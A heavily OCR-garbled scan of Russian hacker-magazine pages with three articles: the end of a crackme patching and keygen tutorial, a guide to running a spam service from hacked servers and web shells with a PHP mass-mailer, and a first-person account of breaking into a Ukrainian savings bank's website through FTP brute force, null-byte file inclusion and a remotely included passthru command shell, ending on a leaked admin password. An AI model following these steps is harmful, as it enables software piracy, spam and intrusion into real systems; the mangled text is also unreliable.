что и ЗеШІдІіетТехіА. Посмотрим, по какому адресу 
она у нас находится... Откроем Ѵіеѵѵ->Метогу и найдем 
дерективу .собе в модуле сгаскте. Вот он — адрес этой 
процедуры — 00401 ЗА2. В любом АРІ справочнике мож- 
но прочитать, что процедура требует пять параметров 
плюс вызов самой процедуры. Где же нам взять столько 
свободного места, не изменяя размера файла? А вот 
где. Вывод МеззадеВохА нам теперь не нужен. Ни пер- 
вый, ни второй. Нообазатиратьсовсем необязательно, 




> На ЭѴЭ ты сможешь 
найти оригинальный 
сгаскте, исходник 
генератора регистра- 
ционного номерана 
асме и скомпилиро- 
ванный кеудеп, атакже 
видеоурок, иллюстри- 
рующий процесс наших 
тренировок. 



> Статья направлена на 
изучение защиты про- 
грамм от взлома и никак 
не должна отразиться 
натвоих крякерских 
деяниях. Завсепроти- 
возаконные действия 
отвечаешьтолькоты сам. 
Ни автор, ни редакция за 
это ответственности не 
несут. Если программа 
тебе нравится, то лучше 
купи ее. А не нравится 
— не пользуйся. 



2№І 



> ЭКЗЕКУЦИЯ (от лат. 
ехзесиііо — исполнение: 

1) исполнение приговора 
(о смертной казни или 
телесных наказаниях); 

2) телесное наказание). 
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> Подопытный сгаскте 




>Наш самописный на ассемблере кеудеп генерирует 
регистрационный код 
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> «Секретный» ключ, с двух сторон ограниченный 



а воттот, который идет первым (с сообщением 
об удачной регистрации), намтеперьточно не 
пригодится, а заодно и переход, который мы 
меняли в первой экзекуции, тоже можно зате- 
реть. Ате байты, что останутся лишними, мы 
оставим пор’ами (пор — команда, которая ни- 
чего не выполняет, но занимает один байт). 
Приступим. Для начала встанем на 
004012ВС, нажмем пробел и напишем «пор». 
Все байты, находящиеся на этой строке 
тоже станут пор. То же самое нужно сделать 
и с последующими пятью строками. Видите, 
как много места у нас теперь освободи л ось! 
Встанем на первый пор и напишем «ризк 
00406749» — это адрес сгенерированного 
кода (ІРагат), «ризк 0» — дополнительная 
информация, которую сейчас можно оста- 
вить на нуле (ѵѵРагат), «ризй ОС» — сообще- 
ние, которое мы посылаем окну (Мзд), «ризй 
64» — идентификатор окна, которому посы- 
лаем сообщение (пЮЭІдІІет), «ризй бѵѵогО 
рігзз: [еЬр+8]» —хэндл родительского окна 
(ШІд), «саІІ 004013А2» — это, собственно, 
сама процедура. Все, что ниже, пусть оста- 
ется пор’ами. О пять за пускаем сгаскте.ехе, 
и программа сама подставляет правильный 
сери йн и к во второй ебіі. 

Снова открываем НІЕѴѴ и правим вышеука- 
занные байты на свои. Сохраняем и запуска- 
ем. Все работает. Теперь можно подправить 
формуй вставить свою картинку с помощью 
любого редактора ресурсов. 

Это тоже действенный и эффективный 
способ, но куда приятнее написать свой 
генератор ключа один раз, а потом просто 
вставлять дизассемблированный код с ал- 
горитмом из любой программы. Этим мы 
сейчас и займемся. 



□ Экзекуция #3 

Теперь мы без труда можем найти место, 
откуда начинается генерация регистраци- 
онного ключа. Оно находится сразу после 
проверки длины имени. Если имя не менее 
четырех символов, то переходим по адресу 
00401163. Посмотри, все, что ниже, — это 
генерация регистрационного кода. Она 
продолжается вплоть до 0040126А, а даль- 
ше программа ставит в обратном порядке 
цифры в коде. Эта процедура длится до 
00401286. 

Теперь откроем любой текстовый редактор, 
выделим весь код от 00401163 до 00401286 
и скопируем его. Не торопись очищать ско- 
пированное от лишнего хлама, нам еще по- 
надобятся адресапереходов, чтобы расста- 
вить метки, чем мы далее и займемся. 

Во всех строках, где есть условные и без- 
условные переходы, указаны адреса, по 
которым эти переходы осуществляются. По 
адресу 00401 192, допустим, — это 00401 196. 
Мы сделаем его первой меткой. Вместо «Ж7. 
ЗНОЯТ сгаскте. 00401196» пишем «Л\І2 
ЗНОЯТ теікаі ». А на строчку выше адреса 
00401196 пишем «теікаі:». Названия меток 
для нас не имеют никакого значения, л инков- 
щик подставит вместо них адреса, по кото- 
рым они находятся. Меняем все переходы на 
метки с названиями теікаі , тека2, теікаЗ и 
т.д. Всего должно получиться 15 меток. Те- 
перь приведем функции ІзігІепА в читаемый 
вид (ІзігІепА возвращает в еах количество 
символовуказан ной строки). У этой функции 
есть один-единственный параметр, кото- 
рый указывает на адрес строки, количество 
символов которой нам требуется получить. 
Если посмотреть строчку над функцией, 



можно заметить, что в первом случае мы пе- 
редаем длину имени, которое находится по 
адресу 00406349, аво втором — сгенериро- 
ванный номер, который находится по адре- 
су 00406549. Передавать функции адреса 
в чистом виде не имеет смысла, потому как 
по ним может находиться все что угодно. А 
вот подставить свои переменные мы имеем 
полное право. Назовем имя пользователя 
— ІІзегЫате, а регистрационный номер — 
ЯедЫитЬег. Сначала просто подставим их в 
функции, а объявлять будем потом: 

Іпѵоке Ізігіеп, АйОН ІІзегЫате 
Іпѵоке Ізігіеп, АйОН РедЫитЬег 

Не забудь убрать перемещения в стек пе- 
ред функциями. После этого замени еще 
в двух местах адреса, где находятся имя 
пользователя и номер, реальными имена- 
ми переменных. 

Наша задача не оставить ни одного ад- 
реса. Только имена переменных. Посмот- 
рим, что дальше: «ХОЯ ВІ_, ВУТЕ РТЯ ЭЗ: 
[ЕАХ+406328]». Что еще за 406328? В ОІІу 
все содержимое памяти, ответственной за 
секцию .сіаіа, показано окном ниже отла- 
дочного кода. Найдем там этот адрес. Как 
видим, ничего вразумительного там ненапи- 
сано. Строка из 20-ти байт, с обеих сторон 
ограниченная нулями. Причем если пере- 
загрузим программу вОІІубез запуска, апо- 
том сгенерируем код, то сможем убедиться, 
что эта строка присутствует как при инициа- 
лизации сгаскте.ехе, так и после генерации 
регистрационного кода. И ниодинеебайтне 
меняется. Но если мы немного вглядимся в 
алгоритм, то сможем заметить, что програм- 
ма неоднократно обращается к разным сме- 
щениям этой строки. Из всего этого можно 
сделать только один вывод — это ключ, с 
помощью которого сгаскте.ехе генерирует 
регистрационный номер. Наша задача этот 
ключ инициализироватьу себя. 

С объявлением переменных опять придется 
подождать, сначала создадим сам ключ. Если 
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> Сгенерированный код лежит в открытом виде и не стесняется :) 



внимательно присмотреться, то можно заме- 
тить, что алгоритм обращается также к адресу 
406327. Значит, это и есть первый байт наше- 
го ключа. Теперь скопируем байты ключа в 
шестнадцатеричных значениях и подставим 
перед самим алгоритмом следующий код: 

тоѵ Ьуіе ріг сіз: [5есге1Кеу],0 
...итак далее до 

тоѵ Ьуіе ріг сіз: [8есге1:Кеу+20],73Іт 

Не забываем про два правила: после шес- 
тнадцатеричного числа ставим знак «б» и, 
если число начинается на букву, то припи- 
сываем передним «0». Теперь берем 406327 
за «ЗесгеіКеу», а все, что больше, приписы- 
ваем к «ЗесгеіКеу» через «+» соответству- 
ющее количество байтов. Так мы сможем 
безболезненно работать с ключом. 

Теперь у нас остаются еще два адреса, 
которым мы не придумали имена пере- 



менных. По адресу 00406345 находятся 
четыре зарезервированных байта, по 
которым последовательно прогоняются 
символы из имени пользователя, назовем 
его ІІІзегІМате. А по 00406749 находится 
область, по размеру точно такая же, как 
и регистрационный номер (10 символов). 
Служит она только для того, чтобы поме- 
нять в обратном порядке цифры номера. 
Назовем ее депРед ЫитЬег. Все, остальное 
— делотехники. Осталось только подпра- 
вить значения переменных и объявить их 
в секции .баіа?: 

РедЫитЬег сІЬ 1 1 сіир (?) 

ВДВДИВИИДЯДІІИ 

ОзегЫатесІЬ 1 00 сіир (?) 

ЮзегМате сІЬ 4 сіир (?) 

Я объявил переменные, зарезервировав 
для них определенное количество байтов, 
но не определил их значения. Они заполня- 



ются в процессе работы программы. 
Теперь компилируем кеудеп: 

ті /с /соТ кеудеп. азт 

И линкуем: 

ипк/ЗІІВЗУЗТЕМіѴѴІМООѴѴЗ кеудеп. оЬі 

□ Злоключение 

Воти все. Каквидишь, обойти защиту плат- 
ных программ не так уж сложно. Но это 
очень простой способ защиты. На самом 
деле, он применяется далеко не в каждой 
второй программе. Но он есть, и это факт. 
И мест применения подобных экзекуций 
тоже очень много. По крайней мере, го- 
раздо больше, чем все привыкли думать. 
Но помни, что это лишь азы грамотного 
крякинга. Переваривай информацию, а я в 
дальнейших статьях попробую рассказать 
о более крутой защите программ и спосо- 
бах ее обхода, □с 




Настоящий ТВ-тюнинг! 





УНИКАЛЬНЫЕ ЖЕЛЕЗО И СОФТ 
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ИНДУСТРИЯ СПАМА 

В ПОСЛЕДНЕЕ ВРЕМЯ СПАМ В БУКВАЛЬНОМ СМЫСЛЕ ЗАХЛЕСТНУЛ РУНЕТ И СЕТЬ В ЦЕЛОМ. С ОДНОЙ СТОРОНЫ, ЭТО ПРИ- 
СКОРБНОЕ СОБЫТИЕ, ВЕДЬ НАВЕРНЯКА ТЕБЕ НАДОЕЛО ЕЖЕДНЕВНО ВЫГРЕБАТЬ ДЕСЯТКИ ЛЕВЫХ ПИСЕМ ИЗ СВОЕГО 
МЫЛЬНИКА, А С ДРУГОЙ... ТЫ ЗАДУМЫВАЛСЯ НАД ТЕМ, КАК РАБОТАЮТ СПАМЕРЫ И КАКОВ ИХ ДОХОД? 

НЕТ, ОНИ НЕ ПЛАТЯТ НАЛОГИ И НЕ ЗАНИМАЮТСЯ БЛАГОТВОРИТЕЛЬНЫМИ РАССЫЛКАМИ. СПАМ — ЭТО БИЗНЕС. И БИЗ- 
НЕС КРУПНЫЙ. НО, КАК ИЗВЕСТНО, В ЛЮБОМ ДЕЛЕ ВАЖЕН ПРАВИЛЬНЫЙ ПОДХОД. ПОЭТОМУ СЕЙЧАС Я РАССКАЖУ ТЕБЕ, 
С ЧЕГО НАЧАТЬ И КАК ВНЕДРИТЬСЯ В СПАМ-ИНДУСТРИЮ. 



з школьного/вузовского курса 
обучения тебе конечно извес- 
тны три основных вопроса эко- 
номики: 

1. Что производить? 

2. Как производить? 

3. Для кого производить? 

Ты, разумеется, скажешь, чтокспамуэто от- 
ношения никакого не имеет. И будешь в кор- 
не неправ. Как я уже сказал, спам — бизнес, 
а бизнес имеет самое непосредственное 
отношение к экономике. Поэтому обо всем 
по порядку. Начнем с вопроса «Что произ- 
водить?». Производить мы, собственно, 
ничего не собираемся, а будем предостав- 
лять услуги спам-сервиса, то есть рассылки 
электронных писем. А вот на втором пункте 



— «Как производить?», нужно остановиться 
более подробно. Для того чтобы организо- 
вать спам-сервис, мало одного желания, 
здесь необходимо учесть несколько важных 
моментов. Во-первых, следует определить- 
ся с методом рассылок. Существует три 
основных способа: 

1. Директ-рассылки. 

2. Спам через соксы. 

3. Ботнет. 

В первом случае обычно используют взло- 
манные серверы, с которых запускают ди- 
рект-рассылку. Во втором — купленные 
дедики с установленным спам-софтом, 
шлющим через соксы. Ну а в третьем спам 
осуществляется при помощи ботнета. Мы 
остановимся на первом способе, так как 



мощного ботнета у тебя скорее всего нет, 
а дедики тоже стоят денег. Общий принцип 
директ-рассылок заключается в следую- 
щем: с несколькиххостов идетспам прямым 
потоком, без использования соксов. Часто 
для этого юзают шеллы и/или карженные 
хостинг-аккаунты, но об этом далее. Итак, с 
методом мы определились — директ-спам. 
Теперь необходимо определиться с «аппа- 
ратной» частью — серверами, с которых 
будут идти рассылки. Как я отметил выше, 
здесь два пути — взлом и кардинг. Ты мо- 
жешь либо заюзать несколько залежавших- 
ся у тебя веб-шеллов, либо скардить пару 
акков на забугорных хостингах. Выбирай 
сам. Отмечу лишь, что шеллы рано или поз- 
дно прикроют, а акки заблочат. Так что, чем 
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> Пускаем МЗТЗС через ЗоскСар 

больше у тебя возможностей, тем лучше. Как получить 
веб-шелл, я объяснять не буду =). А как скардить хос- 
тинг, ты прочитаешь в моей следующей статье (сейчас 
речь не об этом). 

Посылку заказывали? 

Теперь нужно решить вопрос со спам-базами. Здесь 
необходимо определиться с регионами, по которым ты 
собираешься работать. Не советую слать спам в стра- 
ны Африки — это вряд ли принесет тебе ощутимую 
прибыль и спрос натвои услуги. Гораздо более разум- 
ными выглядят рассылки по США и Европе. Как прави- 
ло, такой спам всегда востребован в силу ряда причин: 
ботнетов, скамов и т. д. Не рекомендую останавливать 
свой выбор и на странах СНГ, так как в этой области 
ты будешь заведомо неконкурентоспособен. Поэтому 
решаем спор в пользу США и Европы. Теперь главный 
вопрос: где взять базы? Надо отметить, что этотвопрос 
волнует не тебя одного. Продажаспам-баз — отдельный 
вид бизнеса, который напрямую зависит от спроса на 
те или иные листы. Так как с самого начала мы строили 
свой биз с нуля, есть пара вариантов: 

1. Слить базу со взломанного сервера. 

2. Сгенерировать спам-лист. 

С первым вариантом, думаю, все понятно. Если при 
взломе очередного сервера (хостинга, шопа) тебе 
попалась на глаза здоровенная базенка с мыльника- 
ми юзеров, не забудь бережно забэкапить ее себе на 
винт. В дал ьнейшемонатебе еще пригодится =). Что же 
касается генерирования спам-листов, тотутестьсвои 
нюансы: 

1. Невысокая валидность генерированной базы. 

2. База общего вида (отсутствуют тематики ит. д.). 
Попробуем написать простой генератор спам-листов 
на рбр. Для того чтобы хоть как-то гарантировать ва- 
лидность базы, в качестве логинов юзеров мы будем 
использовать популярные/распространенные слова и 
имена. В этом нам помогут всевозможные словарики 
(скачать их можно на пзбти). Суть генератора в следую- 
щем: беремлогин изсловарика(например, аіех), добав- 
ляем кнемудомен етаіІ-сервиса(например, @таіІ.сот) 
и сохраняем получившийся мыльник (аІех@таіІ.сот) в 
базу. Вроде все просто: 
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> Богатый рынок спам-баз 

В переменной $ботеп находится значение домена 
таіі-сервиса, в файле ѵѵогбіізі.іхі — словарик логи- 
нов (слов/имен), а сам спам-лист сохраняется в файл 
ЬазеЧхі. Конечно, очень высокой валидности обещать 
нельзя, но 70% — вполне реальная цифра, учитывая, 
что мы использовали вордлист с популярными имена- 
ми/словами. 

Напишите письмецо 

Следующий важный этап — выбор софта. Сразу скажу, 
что хороший софт стоит немалых денег (цены на него 
колеблются от $50 до $2к в зависимости от функций и 
условий распространения). Так как денег у нас нет, то 
придется искать более приемлемые варианты. Один из 
них — написание своего софта. Определимся, какими 
основными возможностями он должен обладать: 

1 . Работа с базой мыльников (спам по указанному листу). 

2. Подделка адреса отправителя (часто требуется 
заказчиками). 

3. Ведение лога рассылки (необходимо постоянно кон- 
тролировать процесс). 

4 . Отсылка самого письма. 

Я намеренно не стал указывать использование соксов, 
так как мы шлем спам директ-методом. Можно перечис- 
лить еще несколько функций, но описанных выше впол- 
не достаточно на начальной стадии работы. Итак, с тре- 
бованиями понятно. Остается всего ничего — написать 
такой софт =). Кодить будем на рбр, который устраивает 
нас потрем причинам: 

1. Минимум прав для рбр-скрипта на сервере. 

2. Широкая распространенность рНр. 

3. Хороший, удобный язык (очень подходит для наших 
целей :)). 

Что же, приступим к созданию собственного рбр- 
спамера: 



ідпоге_изег_аЬогі(1); 
зеЩіте_Іітіі(0); 

$ф = Ьреп (",/етаіІз.М". "г"); 

Ьсоипі^ф^ 

ІТ (!$ТрІІ зігіеп ($ігот) == ОН зігіеп ($тзд) == 0){ 
ИсГю (ЧЬо><сеітЕег>Еггог!Ц^ 

:епіег>"); 
хіі; 

Ізе { 

ДІІеЩесЧ ($ф)){ 

До = Ідеіз ($ф); 

таіі ("$іо", "$зифес!", "$тзд", "Ргот: $ігот"); 
ісоипі = $соипі + 1 ; 



>Внимание! Все дейс- 
твия, описанные в ста- 
тье, противозаконны! 
Информация предостав- 
лена исключительно с 
целью ознакомления! 

Ни автор, ни редакция 
за твои действия ответ- 
ственности не несут! 



> На диске ты найдешь 
все описанные в статье 
скрипты, необходимые 
для организации своего 
спам-сервиса. 
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> Предупреждение перед подключением > Потенциальная спам-база) 



> Расшифровка паролей от ѴЭ8 с помо- 
щью сторонних программ 




Теперь осталось написать ШтІ-фор- 
му для управления скриптом. Это не так 
сложно, поэтому смотри код формочки на 
нашем ЭѴЭ. 

А я тем временем расскажу, как юзать наш 
спам-скрипт. Перед запуском рНр-спаме- 
ра тебе нужно залить базу мыльников — 
етаіІз.М, указать адрес отправителя — 
$1опп, тему письма — $зиЬіес1: и сам текст 
— $тзд. Также ты можешь вбить свой мыль- 
ник для чека окончания спама — $рг_таіІ. 
Скрипт ведет лог (Іод.іхі), в котором по ходу 
рассылки отмечается количество разослан- 
ных писем. Для удобства управления спаме- 
ром, рекомендую использовать ІтітІ-форму. 
Тебе достаточно лишь заполнить необходи- 
мые поля и нажать Зіагі Зрат, после чего 
можешь спокойно закрывать браузер и идти 
за пивом :). Чем шире канал сервера, с кото- 
рого ты осуществляешь рассылку, тем быс- 
трее будет разослан весь спам. Но хочу тебя 
предупредить — не стоит заливать базы по 
200-300к мыл к себе на шелл и запускать 
спамер. Админ пропалит тебя, и ты потеря- 
ешь либо шелл, либо доступ к зепбтаіГу- 
Одним словом — не жадничай. Кроме того, 
не забывай сравнивать часовые пояса (свой 
и месторасположения сервера), старайся 
спамить ночью, когда админ сервера спит. 
Ведь не факт, что у него установлены анти- 
спам-демоны, ведущие подробные лог-от- 



четы. В любом случае тебе придется запас- 
тись множеством шеллов, иначе все усилия 
сведутся на нет. 

Почтальона вызывали? 

Ну вот, наконец, ты привел в боевую готовность с 
десяток серверов и полон решимости окунуть- 
ся в спам-индустрию. Но где клиенты? Где те 
люди, для которых ты организовывал свой 
сервис? Спокойно, товарищ, они здесь =). 
А вернее, на известных закрытых форумах. 
Так как репутации у тебя пока нет, придется 
поработать на паблике. Пости о своих услугах 
наразличныххак-порталах, набирайся опыта, 
но самое главное — повышай свой авторитет. 
Спустя пару десятков заказов при качествен- 
ной работе у тебя сформируется своя клиен- 
тура, которая впоследствии сыграет важную 
роль в твоем становлении на андеграунд-сце- 
не, тут уж поверь на слово. Не советую сильно 
задирать ценовые планки, так как конкурен- 
ция среди спамеров достаточно жесткая. Вот 
средние цены на рассылки по базам общей 
тематики: 

1 млн. по ІІЗА — $100; 

1 млн. по ЕІІ — $100; 

1 млн. по РІІ — $150. 

Но если спам производится по каким-либо 
уникальным базам (датинг-сайты, онлайн- 
шопы, платежные системы), то цена за рас- 
сылку 200к мыл может доходить до $200-300. 
Здесь просто следует понимать, что все услу- 
ги оказываются по отдельной договореннос- 
ти с клиентом, в которой ты заинтересован в 
первую очередь. Таковы законы бизнеса. 

Что такое хорошо, что такое плохо 

Я не собираюсь читать тебе лекции поэтике 
и говорить, что спам — это плохо. Но про 
возможные последствия упомяну. В России 
с 1 июля 2006 года вышла новая редакция 
закона «О рекламе», в которой оговарива- 
ется ответственность за подобные элект- 
ронные рассылки. Однако законодатели не 
учли множества деталей, благодаря чему 
спамеры продолжают активную работу в 
рунете. В США дело обстоит иначе. Там спа- 
меров не любят, я бы даже сказал, очень 
не любят. И уголовная ответственность на- 



ступает обычно незамедлительно. Так что, 
если ты решил получить вид на жительство 
в США, тебе лучше забыть о спаме. В об- 
щем, дорогуятебе показал, авыбор изволь 
сделать сам. □с 



Профессиональный спам-софт 

Прочитав статью, скорее всего, ты сразу 
поспешишь заюзать мой софт. Конечно, те 
скрипты, которые я написал, помогут тебе 
еще не раз. Но настоящий, профессио- 
нальный спам-софт обладает просто пот- 
рясающими возможностями. Ты наверняка 
никогда не слышал про такие программы, 
как Яеасіог Маііег, хзепсіег, хзтірЬпііе и т.д. 
Это и неудивительно, ведь их не продают 
направо и налево. Такой софт является при- 
ватным, и его стоимость может доходить до 
нескольких тысяч вечнозеленых американ- 
ских президентов. Часть подобныхутилит я 
уже не раз описывал в рубрике Х-Тооіз (мо- 
жешь проверить подшивку «Хакера»). Но 
все же хочу привести тебе наглядный при- 
мер. СкриптрИр-зраттег'а, который я нако- 
дил к статье, умеет исправно слать письма, 
но обладает рядом недостатков: 

1. Светит ІР сервера-отправителя (его мо- 
гут просто-напросто добавить в блэк-лист). 

2. Однопоточный (работает в один поток). 

3. Требуетобязательного наличия насерве- 
резепсітаіі/аналогичного почтового прило- 
жения (иначе скрипт не будет пахать). 

4. Не обходит ограничения антиспам- 
демонов. 

А теперь представь возможности профес- 
сионального софта: 

1. Работа через сокс-серверы. 

2. Многопоточность (с регулированием ко- 
личества потоков). 

3. Независимость отустановленных на сер- 
вере приложений. 

4. Обход ограничений антиспам-демонов. 
Не спорю, подобные программы требуют 
колоссальных вложений, но, поверь, все за- 
траты окупятся в полном объеме и принесут 
существенных доход. 
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ГЕНЕРАЛЬНЫЙ 
СПОНСОР 
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іЫЕѴІЧЕКіІПі С №. ЫАТиШЛ 



"ФУТБОЛЬНЫЙ МЕНЕДЖЕР"! 

СОЗДАЙ СВОЮ КОМАНДУ ИЗ РЕАЛЬНЫХ ИГРОКОВ И ПРИВЕДИ ЕЕ К ПОБЕДЕ 



ТЫ ПОЛУЧАЕШЬ 5135 МИЛЛИОНОВ 

но приобретение игроков российской преыьер-лиги при 
регистрации на сайге ууѵууу.ТоІ^аІ-^ооТЬаІІ.ш. 

Подробности но сайте ѵллплг.ІоІаІ-ѴааІЬаІІ.т 



ГЛАВНЫЙ ПРИЗ - 
ПОЕЗДКА НА ФИНАЛ ЛИГИ 
ЧЕМПИОНОВ 2000/07 





Г л 

НАВЕРНОЕ, ТЫ ПОЛАГАЕШЬ, ЧТО БАН- 
) КОВСКИЕ СЕТИ ЯВЛЯЮТСЯ САМЫМИ ЗА- 
ЩИЩЕННЫМИ. ВЕДЬ В ОРГАНИЗАЦИЯХ 
4 ТАКОГО МАСШТАБА РАБОТАЮТ ПРОФЕС- 
СИОНАЛЫ. КРОМЕ ТОГО, БАНКИ ТРАТЯТ 
ОГРОМНЫЕ ДЕНЬГИ НА ОБЕСПЕЧЕНИЕ 
ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ 
И ПОДГОТОВКУСПЕЦИАЛИСТОВ. ВТАКИХ 
УСЛОВИЯХ ПРЕДПРИНИМАТЬ КАКИЕ- 
ЛИБО ПОПЫТКИ НЕСАНКЦИОНИРО- 
ВАННОГО ПРОНИКНОВЕНИЯ КАЖЕТСЯ 
БЕССМЫСЛЕННЫМ. НО ЭТО НЕТАК. ЕСЛИ 
ЕСТЬ СИСТЕМА, ТО ЕСТЬ И БАГИ. ВЗЛО- 
МАВ САЙТ СБЕРБАНКА УКРАИНЫ, 

Я В ОЧЕРЕДНОЙ РАЗ УБЕДИЛСЯ В ЭТОМ. 
ДАЧТОТАМ ГОВОРИТЬ, СЕЙЧАСТЫ И САМ 
ВСЕПОЙМЕШЬ. 

V у 



БЕРЕМ СБЕРБАНК 



ВЗЛОМ СБЕРЕГАТЕЛЬНОГО БАНКА УКРАИНЫ 



ставал ись считанные дни лета. 
В голове прокручивались 
мысли о том, что было сдела- 
но за три прошедших месяца. 
Конечно, сделано было многое, но мне 
хотелось большего. Не скрою, я давно 
мечтал получить контроль над каким-ни- 
будь крупным банковским ресурсом. По- 
этому, наткнувшись на одном из порта- 
лов на адрес сайта Сбербанка Украины 
( ЫірУ/заѵеЬапк.сот.иа Т я машинально 
кликнул на линк, и уже через несколько 
секунд страница загрузилась. Дизайн ре- 
сурса впечатлял — цветовая гамма была 
подобрана идеально, видимо руководс- 
тво банка весьма щедро финансировало 
отдел ИТ. Оглядевшись, я прикинул, что 
ковырять движок не имеет смысла. Навер- 
няка он был написан на заказ и выполнен 
по качеству не хуже дизайна. Здесь ну- 
жен был другой подход, вернее, подход с 
другой стороны. Для начала я решил про- 
смотреть список хостящихся на серве- 
ре сайтов, воспользовавшись аналогом 
сІотаіпзсІЬ.пеІ — ѵѵѵѵѵѵ.сіотаіпіооіз.сот . К 
моему удивлению, их было несколько. 

Все эти ресурсы, за исключением бан- 
ковского, принадлежали украинскому 



провайдеру «Запорожье Онлайн». К со- 
жалению, их быстрый осмотр не принес 
положительных результатов, хотя я и не 
рассчитывал на легкую прогулку. Вместо 
того чтобы плотнее заняться изучением 
сайтов, я запустил птар и удостоверился 
в наличии открытого 2 1-го порта с РгоРТО 
1.30. Идея была такова: так как сервер 
принадлежал провайдеру, то, скорее 
всего, на нем существовало приличное 
количество фтп-аккаунтов, а значит, ве- 
роятность успешного б рута повышалась 
в несколько раз. 

Я не сторонник брутфорса, но упускать 
такой шанс было бы глупо. Проблема за- 
ключалась лишь в выборе софта: серве- 
ра с установленной гидрой под рукой не 
оказалось, а брутить виндовым софтом 
по дайлапу — смешно. В такой ситуации 
выход был найден один — написание 
специализированного рбр-скрипта для 
брута фтп-аккаунтов. Подавив в себе 
остатки сна, я принялся кодить, в итоге 
наколбасив полноценный ѵѵеЬ-брутфорс 
(ищи его исходник на нашем 0\Ю). 

Теперь было достаточно залить скрипт на 
удаленный сервер, указать хост ($Нозі), 
загрузить на сервер файл с логинами 



юзеров (изегз.іхЦ и хороший словарик 
(сІісі.іхД. После этого можно было запус- 
кать брут и идти спать, что я и сделал =). 

□ Обломы и успехи 

Проснувшись, я глянул на часы — по моим 
расчетам брут должен был уже закончить- 
ся. Подойдя кмонитору и вбивурл шелла, я 
проверил лог. Увы, но мне не повезло — па- 
ролей я не нашел. Что же, оставались сай- 
ты, которые хостились натом же сервере. 
Я сравнил часовые пояса и, посчитав раз- 
ницу во времени сУкраиной (там была глу- 
бокаяночь), принялсязаработу. Проверка 
первых нескольких сайтов, как и провер- 
ка ресурса провайдера «Запорожье 
Онлайн», не дала никаких результатов. 
Правда, я нашел несколько директорий с 
неправильно выставленными сбтосГами, 
но толку от них было мало. Наступила 
очередь банковского сайта. Полазив по 
разделам и осмотрев движок, я не заме- 
тил ничего подозрительного и уже начал 
думать о завершении неудачной атаки, но 
тутувидел в адресной строке ІЭРІ_ вида: 

Ьйр://\л/\л/ѵѵ.5аѵеЬапк.сот.иа/раде.рІпр?раде=іпсІсгесІ 

ШНо&Іапд=гиз 
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> Просматриваем свои права на сервере с банковс- 
ким сайтом 




> Главная страница дырявого банка 



По-видимому, скрипт раде.рітр подключал файлы, на- 
ходящиеся на сервере, и, возможно, был подвержен 
инклуду. Недолго думая, я изменил значение парамет- 
ра раде в адресной строке и нажал епіег: 

Ьйр://ѵѵѵѵѵѵ.заѵеЬапк. сот. иа/раде. рЬр?раде=../../../../../../../../еІс/ 
раззѵѵсІ&Іапд=гиз 

Но меня ждал облом — скрипт вернул пустую страни- 
цу. Вероятно, программеры просто решили пошутить, 
указав распространенное название переменной. И 
тут я внезапно вспомнил про 0-байт. Бага была ста- 
рая, она позволяла отбрасывать расширение при ин- 
клуде файлов. Вряд ли мне это могло помочь, но поп- 
робовать стоило. Придвинув клавиатуру, я добавил к 
раззѵѵсі шестнадцатеричное значение 0-байта (%00) и 
изменил запрос: 

ЬДр://ѵѵѵѵѵѵ.заѵеЬапк.сот. иа/раде. рЬр?раде=. ./. ./. ./. ./. ./. ./. ./. ,/еіс/ 
раззѵѵс1%00&1апд=гиз 

Каково же было мое удивление, когда вместо чистой 
страницы я увидел содержимое /еіс/раззѵѵсі. 

Значит, скрипт раде.рітр инклудил файлы с определен- 
ным расширением. Я почувствовал, как на лбу просту- 
пают капли пота, вотуж чего действительно не ожидал, 
так это встретить старую багу на банковском ресурсе. 
Но нужно было двигаться дальше. Локальный инклуд 
не давал простора для действий, и меня мало прельща- 
ло занятие в виде «слепого» поиска конфигов по всему 
серверу. Поэтому было решено проверить наличие уда- 
ленного инклуда. Я создал файл икзіт. Іхі, в котором вбил 
три заветных строки: 

<? 

раззІЬги ($стсІ); 

В 

Затем я залил зіт.іхі к себе на сервер и изменил вид ад- 
ресной строки: 

ІтНр://ѵѵ\л/\л/.заѵеЬапк.сот. иа/раде. рЬр?раде=Ы:1р://сервер.сот/зЬ. 
М%00&стсІ=ісІ&Іапд=гиз 

Обновив страницу, я прочитал ответсервера: 

иісІ=80 (ѵѵѵѵѵѵ) дісІ=80 (ѵѵѵѵѵѵ) дгоирз=80 (ѵѵѵѵѵѵ) 



Это означало только одно — я мог выполнять произ- 
вольные команды. Сказать, чтоябыл обрадован, — не 
сказать ничего. Состояние эйфории охватило меня с 
ног до головы. Подумать только, я находился внутри 
сервера, на котором хостился банковский сайт! 

□ Взгляд изнутри 

Наконец, собравшись с мыслями, я стал осматри- 
ваться в системе. На Украине уже наступило утро, и 
нужно был о торопиться. Выяснилось, что на сервере 
крутилась РгееВЗЭ с ядром версии 6.0, под которое 
у меня, увы, не было сплойта. Кроме того, анализ 
каталога /Йоте показал, что моих прав хватало для 
просмотра всех пользовательских каталогов. Но, 
вспомнив про свою цель, я вернулся к банковскому 
ресурсу. Для начала я решил просмотреть корень 
веб-каталога. Выполнив команду Із -Іа, я начал изу- 
чать содержимое директории: 

Содержимое избранного каталога банковского ресурса 

— гѵѵхг-х — 1 зЬапк ѵѵѵѵѵѵ 2980 Арг 1310:19 іпсІсгесІІІроІгеЬІЩиз.іпс 

— п/ѵхг-х — 1 зЬапк ѵѵѵѵѵѵ 2944 Арг 1310:19 іпЬсгеЬІІроІгеЬІЩикг.іпс 

— п/ѵхг-х — 1 зЬапк ѵѵѵѵѵѵ 3831 Арг 1310:19 іпсІех_гиз.рЬр 

— п/ѵхг-х— 1 зЬапк ѵѵѵѵѵѵ 381 2 Арг 1310:19 іпсІех_икг.рЬр 

— п/ѵхг-х— 1 зЬапк ѵѵѵѵѵѵ 91 5 Арг 1310:19 іпсИтапз{егз_гиз.іпс 

— п/ѵхг-х— 1 зЬапк ѵѵѵѵѵѵ 91 5 Арг 1310:19 іпсИгапзТегз_икг. іпс 

— п/ѵхг-х — 1 зЬапк ѵѵѵѵѵѵ 9668 Арг 1310:21 кигз_асІтіп.рЬр 

— п/ѵхг-х — 1 зЬапк ѵѵѵѵѵѵ 4530 Арг 1310:19 ІізЦгюсІиІе.рЬр 

Больше всего меня интересовала админка ресурса 
и сорцы движка. Обнаружив файл с названием кигз_ 
асітіп. рігр и прочитав его, я нашел один из паролей: 

<? 

іТ (зеззіоп_ісІ ()=="») 
зеззіоп_з1аП(); 

іЦ$_ЗЕЗЗЮІ\І [’раззѵѵогсі 1 ] ! = | 1гие | ) 

1 

і1($_РОЗТ['раззѵѵогсІ_ѵаІие , ]!= «8уБ1р646г») 

■ 

